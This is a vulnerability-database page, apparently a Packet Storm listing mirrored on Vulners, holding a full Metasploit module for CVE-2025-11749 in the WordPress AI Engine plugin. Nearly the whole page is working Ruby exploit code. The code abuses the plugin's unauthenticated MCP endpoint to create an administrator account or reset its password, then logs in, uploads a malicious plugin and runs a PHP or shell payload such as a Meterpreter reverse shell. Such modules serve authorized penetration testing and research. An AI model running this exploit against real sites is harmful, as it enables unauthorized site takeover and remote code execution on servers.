Lucene search
K

📄 WordPress AI Engine 3.1.3 Remote Code Execution

🗓️ 04 Dec 2025 00:00:00Reported by Khaled Alenazi, dledda-r7, Valentin Lobstein, Emiliano VersiniType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 144 Views

Exploits unauthenticated admin creation in WordPress AI Engine ≤3.1.3 to enable remote code execution.

Related
Code
##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Payload::Php
      include Msf::Exploit::FileDropper
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HTTP::Wordpress
    
      prepend Msf::Exploit::Remote::AutoCheck
    
      ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
      SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
            'Description' => %q{
              This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
              (versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
              via the MCP (Model Context Protocol) endpoint without authentication. The module supports
              both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
              account is created, the module uploads and executes a malicious plugin to achieve remote
              code execution (RCE).
            },
            'Author' => [
              'Emiliano Versini',                             # Vulnerability discovery
              'Khaled Alenazi (Nxploited)',                   # PoC
              'Valentin Lobstein <chocapikk[at]leakix.net>',  # Metasploit module
              'dledda-r7'                                     # Reviewer
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2025-11749'],
              ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
            ],
            'Platform' => %w[php unix linux win],
            'Arch' => [ARCH_PHP, ARCH_CMD],
            'DisclosureDate' => '2025-11-04',
            'DefaultTarget' => 0,
            'Privileged' => false,
            'Targets' => [
              [
                'PHP In-Memory',
                {
                  'Platform' => 'php',
                  'Arch' => ARCH_PHP
                  # tested with php/meterpreter/reverse_tcp
                }
              ],
              [
                'Unix/Linux Command Shell',
                {
                  'Platform' => %w[unix linux],
                  'Arch' => ARCH_CMD
                  # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
                }
              ],
              [
                'Windows Command Shell',
                {
                  'Platform' => 'win',
                  'Arch' => ARCH_CMD
                  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
                }
              ]
            ],
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
            }
          )
        )
    
        register_options(
          [
            OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
            OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
            OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
          ]
        )
      end
    
      def check
        return CheckCode::Unknown unless wordpress_and_online?
    
        plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4')
        return plugin_check if plugin_check == CheckCode::Safe
    
        @token = find_token
        return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token
    
        CheckCode::Appears
      end
    
      def exploit
        fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
    
        @token ||= find_token
        fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token
    
        username = datastore['USERNAME']
        password = datastore['PASSWORD']
        email = datastore['EMAIL']
    
        result = create_admin_user(@token, username, password, email)
        fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false
    
        if result == :user_exists
          print_warning('User already exists, updating password and continuing exploitation...')
          update_user_password(@token, username, password)
        end
    
        admin_cookie = wordpress_login(username, password)
        unless admin_cookie
          error_msg = 'Failed to log in to WordPress admin.'
          error_msg += ' User may exist with a different password.' if result == :user_exists
          fail_with(Failure::UnexpectedReply, error_msg)
        end
    
        upload_and_execute_payload(admin_cookie)
      end
    
      # REST API helpers
      def send_rest_request(rest_path, method: 'GET', data: nil)
        opts = {
          'method' => method,
          'ctype' => method == 'POST' ? 'application/json' : nil,
          'data' => data
        }
    
        uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
        res = send_request_cgi(opts.merge('uri' => uri))
        return res if res&.code == 200
    
        vars_get = { 'rest_route' => rest_path }
        send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
      end
    
      def find_token
        extract_token_from_routes(send_rest_request('/'))
      end
    
      def extract_token_from_routes(res)
        return nil unless res&.code == 200
    
        routes = res.get_json_document&.dig('routes')
        return nil unless routes.is_a?(Hash)
    
        mcp_regex = %r{^/mcp/v1/([^/]+)/sse$}
        routes.each_key do |route|
          next unless route.is_a?(String)
    
          match = route.match(mcp_regex)
          next unless match
    
          token = match[1]
          next if token == 'sse' || token.empty?
    
          return token
        end
        nil
      end
    
      # MCP API helpers
      def send_mcp_request(token, segments, method: 'GET', data: nil)
        path = "/mcp/v1/#{token}/#{segments.join('/')}"
        send_rest_request(path, method: method, data: data)
      end
    
      def build_mcp_payload(tool_name, arguments)
        {
          'jsonrpc' => '2.0',
          'id' => rand(1..999_999),
          'method' => 'tools/call',
          'params' => {
            'name' => tool_name,
            'arguments' => arguments
          }
        }.to_json
      end
    
      def send_mcp_tool_call_raw(token, tool_name, arguments)
        payload = build_mcp_payload(tool_name, arguments)
        res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
        return nil unless res
        return nil unless res.code == 200
    
        json_response = res.get_json_document
        return nil unless json_response.is_a?(Hash)
    
        json_response.dig('result', 'content')
      end
    
      def send_mcp_tool_call(token, tool_name, arguments)
        payload = build_mcp_payload(tool_name, arguments)
        res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
        return false unless res
        return true if res.code == 204
        return false unless res.code == 200
    
        json_response = res.get_json_document
        return false unless json_response.is_a?(Hash)
    
        error = json_response['error']
        return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
        return :user_exists if error.is_a?(Hash) && error['message']&.match?(ERROR_PATTERN)
    
        result_content = json_response.dig('result', 'content')
        return true if result_content&.any? { |item| item['text']&.match?(SUCCESS_PATTERN) }
    
        body = res.body.to_s
        return :user_exists if body =~ ERROR_PATTERN
        return true if body =~ SUCCESS_PATTERN
    
        false
      end
    
      # User management
      def get_user_id(token, username)
        arguments = {
          'search' => username,
          'search_columns' => ['user_login']
        }
    
        result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
        return nil unless result_content.is_a?(Array)
    
        result_content.each do |item|
          next unless item.is_a?(Hash) && item['text']
    
          text = item['text'].to_s
          begin
            users = JSON.parse(text)
            users = [users] unless users.is_a?(Array)
            user = users.find { |u| u['user_login'] == username }
            return user['ID'].to_i if user && user['ID']
          rescue JSON::ParserError
            next
          end
        end
    
        nil
      end
    
      def create_admin_user(token, username, password, email)
        arguments = {
          'user_login' => username,
          'user_email' => email,
          'user_pass' => password,
          'role' => 'administrator'
        }
        send_mcp_tool_call(token, 'wp_create_user', arguments)
      end
    
      def update_user_password(token, username, password)
        user_id = get_user_id(token, username)
        return false unless user_id
    
        arguments = {
          'ID' => user_id,
          'fields' => {
            'user_pass' => password
          }
        }
        result = send_mcp_tool_call(token, 'wp_update_user', arguments)
        print_warning('Password update may have failed, attempting login anyway...') unless result
        result
      end
    
      # Payload execution
      def upload_and_execute_payload(admin_cookie)
        plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
        payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
    
        zip = generate_plugin(plugin_name, payload_name)
        fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
    
        register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
        register_dir_for_cleanup("../#{plugin_name}")
        payload_file = "#{payload_name}.php"
        payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
        send_request_cgi('uri' => payload_uri, 'method' => 'GET')
      end
    end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Dec 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.85741
SSVC
144